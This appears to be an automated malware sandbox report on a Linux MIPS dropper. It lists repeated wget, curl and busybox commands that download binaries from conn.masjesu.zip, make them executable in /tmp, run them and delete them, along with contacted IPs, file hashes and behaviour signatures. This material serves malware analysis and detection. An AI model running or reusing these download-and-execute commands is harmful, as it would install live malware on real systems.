[/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/chmod
[chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH
[./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/rm
[rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/chmod
[chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj
[./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/rm
[rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/chmod
[chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU
[./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/rm
[rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/chmod
[chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr
[./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/rm
[rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/chmod
[chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya
[./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/rm
[rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/chmod
[chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8
[./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/rm
[rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/chmod
[chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s
[./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/rm
[rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/chmod
[chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T
[./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/rm
[rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/chmod
[chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
[./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/rm
[rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/chmod
[chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs
[./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/rm
[rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/chmod
[chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z
[./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/rm
[rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/chmod
[chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF
[./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/rm
[rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/chmod
[chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j
[./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/rm
[rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 02:03
Reported
2024-11-24 02:06
Platform
debian9-mipsel-20240418-en
Max time kernel
77s
Max time network
79s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | N/A |
| N/A | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | N/A |
| N/A | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | N/A |
| N/A | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | N/A |
| N/A | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | N/A |
| N/A | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | N/A |
| N/A | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | N/A |
| N/A | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | N/A |
| N/A | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | N/A |
| N/A | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | N/A |
| N/A | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | N/A |
| N/A | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | N/A |
| N/A | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | N/A |
| N/A | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | N/A |
| N/A | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | N/A |
| N/A | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | N/A |
| N/A | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | N/A |
| N/A | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | N/A |
| N/A | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | N/A |
| N/A | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | N/A |
| N/A | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | N/A |
| N/A | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | N/A |
| N/A | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | N/A |
| N/A | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | N/A |
| N/A | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | N/A |
| N/A | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | N/A |
| N/A | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | N/A |
| N/A | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
